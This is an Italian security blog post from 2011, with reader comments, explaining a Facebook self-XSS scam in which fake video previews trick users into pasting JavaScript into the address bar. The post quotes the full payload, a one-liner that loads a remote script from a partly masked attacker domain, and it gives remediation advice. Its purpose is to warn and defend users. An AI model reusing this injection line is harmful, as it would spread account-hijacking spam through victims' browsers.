domenica 18 settembre 2011

Facebook scam: false anteprime video inducono ad azioni automatiche


Un nuovo attacco del tipo javasticking in lingua italiana è in atto da diverse ore su Facebook. Molti utenti stanno vedendosi letteralmente inondare la propria bacheca con miniature video che invitano alla visualizzazione di filmati dove si è protagonisti, in realtà inesistenti. L'invasione è del tipo "virale" da non confondere con "virus", anche se molti utenti e pagine confondono spesso questi termini, considerandoli la stessa cosa. 

Infatti ecco cosa leggiamo su Facebook: "ATTENZIONE A TUTTI...... sulle bacheche compaiono degli strani video con provenienza youtube...mandati da una persone di quelle che abbiamo tra le nostre amicizie con una frase che più o meno dice così...CIAO, come stai? ma dimmi (il vostro nome) sei proprio tu in questo video? ecco NON APRIRLO ASSOLUTAMENTE contiene un link ruba profilo e quindi addio anche alle pagine eliminarlo istantaneamente dalla bacheca!Copialo e incollato nella tua bacheca e passate parola.CONDIVIDETE E FATE GIRARE". 

In realtà non vi è alcun furto del profilo o di pagine, ma consiste "semplicemente" in una serie di comandi in javascript effettuate in maniera "quasi" automatica dall'utente che cade nella trappola. Si tratta di diversi post che contengono testi simili:

Ciao [nome] ma sei te in questo video!!
YouTube
www.facebook.com
[Nome] Pazzesco!! non posso credere che lo hai fatto davvero


Ciao [nome] ti hanno taggato in questo video?
YouTube
www.facebook.com
[Nome] Incredibile! Ma perche lo hai fatto


Ed inoltre:
Questa Ragazza deve essere pazza per aver fatto questo!
VIDE0
www.facebook.com
Cavolo ma le persone stanno proprio fuori! Ma come si fa a fare questa cosa!


Cominciano spiegando che i link "YouTube" e "VIDE0" non sono altro che collegamenti ipertestuali che riportano alla bacheca del profilo utente (http://www.facebook.com/profile.php?sk=wall). Se clicchiamo sulle false anteprime dei video, per coloro che hanno installato correttamente l'ultima versione di flash player, verrà visualizzato il seguente messaggio:

Controllo di sicurezza Facebook.
Per vedere il video segui i passaggi
Ci scusiamo per il disagio
Continue


Si tratta di una finestra di dialogo simile a quella che YouTube presenta quando il filmato non è disponibile nel paese dell'utilizzatore, quindi l'utente viene invitato a premere alcuni tasti in sequenza che nascondono istruzioni automatizzate.


Per prima cosa saremo invitati a selezionare l'URL presente sulla barra degli indirizzi, cliccare J (per cancellare l'URL) e dunque la combinazione di tasti CTRL + V. Con quest'ultima operazione incolleremo la seguente istruzione javascript: "(a=(b=document).createElement('script')).src='http://www.******saliensstreaming.com/tag/fb.php',b.body.appendChild(a);void(0)" e poi il tasto INVIO per confermare l'operazione. 

In realtà l'utente avrà eseguito una serie una serie di azioni come se fosse lui stesso a compierle. Tali azioni si limitano, per adesso, all'autopubblicazione dello stesso post nella bacheca propria e in quelle degli amici, in modo da diffondersi viralmente. Il sito collegato ai post è il seguente:


Al momento non abbiamo rilevato malware (virus) e molti di questi link sono già stati bloccati da Facebook. Nonostante ciò questo nuovo metodo è riuscito a bypassare il controllo per queste tipologie di truffe da parte del sistema automatico di Facebook. Ciò perchè in precedenza era stato settato al massimo livello ed ha fatto si che molte applicazioni fossero disattivate per errore da Facebook. 

Il consiglio è quello di rimuovere i post spam dalle vostre bacheche, passando il mouse in alto a destra del post e cliccando sulla X che appare. in questo modo potrete rimuovere sia il post che la preferenza alla pagina o applicazione. 

Se ciò non dovesse essere sufficiente, potete controllare l'eventuale preferenza data inconsapevolmente a pagine sconosciute, collegandovi http://www.facebook.com/editprofile.php?sk=activities e per verificare le applicazioni usate http://www.facebook.com/settings/?tab=applications. Informate i vostri amici e prestate attenzione prima di compiere qualsiasi azione "inusuale" sul social newtork, in special modo quando ricevete post o link dai vostri amici. Infatti nella stragrande maggioranza di queste tipologie di truffe è proprio l'amico ad essere veicolo inconsapevole.

28 commenti:

  1. E' verissimo, io infatti ho eseguito il javascript proprio per vedere cosa faceva, non conosco bene il linguaggio del genere, però in una decina di minuti elimini tutti i video, LOL

    RispondiElimina
  2. ma se uno clicca sopra a questi finti video che succede?

    RispondiElimina
  3. per sbaglio ho aperto la pagina del video uguale a questi descritti perchè non ero informata, ma non ho seguito le istruzioni. Ho subito chiuso la pagina e cancellato il video dalla mia bacheca. Devo fare qualche altra operazione per controllare se tutto è apposto?

    RispondiElimina
  4. io ho aperto il video e ho cambiato immediatamente la password visto che c'èra scritto nelle istruzioni però mio fratello ha perso completamente il suo profilo.. sapete come si fà ha recuperarlo?

    RispondiElimina
  5. io ho ricevuto il video ma lo cancellato subito il problema si è verificato dopo poco, mi è stato richiesto per due volte di rifare l'accesso a fb nonostante fossi all'interno di fb. Io come una "polla" ho rifatto l'accesso inserendo tutti i dati e la password e così mi sono ritrovata a non poter più accedere alla mia mail di riferimento di fb... ho dovuto cambiare password e nome... volevo sapere mi hanno rubato le credenziali? Devo fare altri passaggi?

    RispondiElimina
  6. io ho cliccato sul link di un mio amico ma non mi è uscita nessuna schermata di digitazione, semplicemente sono stata rimandata sulla pagina del mio profilo...quindi cos'è successo? ho cambiato cmq la password, ho sbagliato?

    RispondiElimina
  7. è SUCCESSO LO STESSO ANCHE A Me! ho cliccato sul link di un mio amico ma non mi è uscita nessuna schermata di digitazione, semplicemente sono stata rimandata sulla pagina del mio profilo... cambio la pw.. speo sia sufficente..

    RispondiElimina
  8. Perso in che senso? non può accedervi? Se nel momento in cui si accede facebook comunica password errata, bisogna effettuare la procedura di recupero indicata. se non si riesce nemmeno in quel modo è possibile segnalare l'account come 'È il mio profilo, ma non posso più accedervi'

    RispondiElimina
  9. anche io ho cliccato inavvertitamente su uno d questi video...mi mandava sul mio profilo. ho cambiato pssw e per ora accedo senza problemi. devo ritenermi tranquillo? grazie...

    RispondiElimina
  10. idem (rimanda alla pagina della bacheca) può dipendere dalla connessione protetta in https?

    RispondiElimina
  11. ...a me è successo con il video di bin laden che aveva lo stesso meccanismo...ho fatto a scansione del pc immediatamente ed ho trovato una sere di trojan...

    RispondiElimina
  12. Rimanda in bacheca perchè molti sono stati già disattivati. Per Bin Laden intendi questo http://www.protezioneaccount.com/2011/05/bin-laden-attacchi-malware-javascript.html

    RispondiElimina
  13. salve, poco importa se perdo il profilo di facebook o le pagine. A me interessa sapere se attraverso questo sistema vedono tutto quello che c'è sul mio pc, posta e pssw comprese. Io non ho selezionato il link in alto, perchè grazie a..alla mia ignoranza, non ho capito che si riferiva all'indirizzo http in alto, e quindi ho cercato di copiare quello dell'esempio. Però ho cliccato ctrl +v+ invio. Posso stare tranquilla? oggi ho attivato un altro antivirus che scansiona tutto il pc PRIMA dell'avvio di windows. Lei admin, cosa consiglia per essere proprio sicuri di non essere spiati? Grazie per l'aiuto.

    RispondiElimina
  14. Scusa ma può essere che per questo l'account ti si chiude e nn riesci ad entrare?Grazie

    RispondiElimina
  15. Il Javasticking su facebook fin'ora rilevato non ha portato a furto di password all'interno del browser, dunque se hai cambiato la password al tuo profilo facebook puoi star tranquilla per le password memorizzate nel browser. Se non hai effettuato alcun procedura di download o aperto pagine oltre quella già citata, la scansione antivirus in questi casi risulta perfettamente inutile.

    RispondiElimina
  16. Come faccio a creare video come quelli

    RispondiElimina
  17. Intendi false anteprime video?!

    RispondiElimina
  18. Come fanno i criminali informatici a creare le false anteprime dei video? Questo attacco ruba le password degli account? Poi come fanno a reindirizzare ad esempio su un sito nocivo??o di phishing??

    RispondiElimina
  19. Ciao,ho aperto il video,ma mi sono sibito reso conto della fregatura e l'ho cancellato cambiando pure la password...mi hanno fregato il profilo o posso star tranquillo? alcuni mi hanno detto che è necessario cancellare l'account perchè l'hacker sarebbe ancora dentro!!

    RispondiElimina
  20. a me è apprso questo messaggio
    ei, ma sei proprio te in qsto video?? mi sembra strano... goo.gl/qeNY5?1997129
    ed io, ignaro di tutto, ho cliccato, poi mi è apparsa una schermata che diceva che per motivi di sicurezza per attivare l'applicazione dovevo inserire il numero di telefono sul quale mi sarebbe arrivata una password da inserire, ed io come un fesso ho scritto il mio numero di cellulare ma avendo fiutato (aimè troppo tardi)il pericolo ho cancellato l'SMS.
    Ora mi è venuto il dubbio che possano avermi clonato il numero di cellulare, è possibile?

    RispondiElimina
  21. A me invece è andata peggio. Ho stupidamente aperto ed ora il computer non si accende più. Che fare?

    RispondiElimina
  22. Io ho ricevuto questo post che diceva di vedere se nel video c'ero io, c'era un URL con le virgole al posto dei puti e mi veniva chiesto di fare la sostituzione e poi provare ad aprire il video, l'ho fatto, mi ha mandato su youtube e poi per vedere il video mi diceva di scaricare una nuova versione di flash player, fatto anche quello, accidenti a me!!!! Risultato ho inondato svariati amici di questo stesso post, e anche la mia ragazza che usa lo stesso pc ha avuto lo stesso problema, io al momento ho cambiato la password e poi ho disabilitato tutte le applicazioni e ho tolto nelle info una cosa di Bin Laden, che altro dovrei fare?

    RispondiElimina
  23. la tecnica che stanno usando in questo momento in atto su facebook...al 25/1/2012..e aver collegato il filmato al mi piace della pagina..di una pagina..e stanno prendendo piu' di 1000 "mi piace" ogni 4-5 ore...strano che nessuno li ferma..il video è quello di Brand Russel e....home sex ecc

    RispondiElimina
  24. non penso che si possa clonare un numero di telefono semplicemente avendolo... no?
    Più che altro è possibile che ti intasino il cellulare di sms inutili e pubblicitari.

    RispondiElimina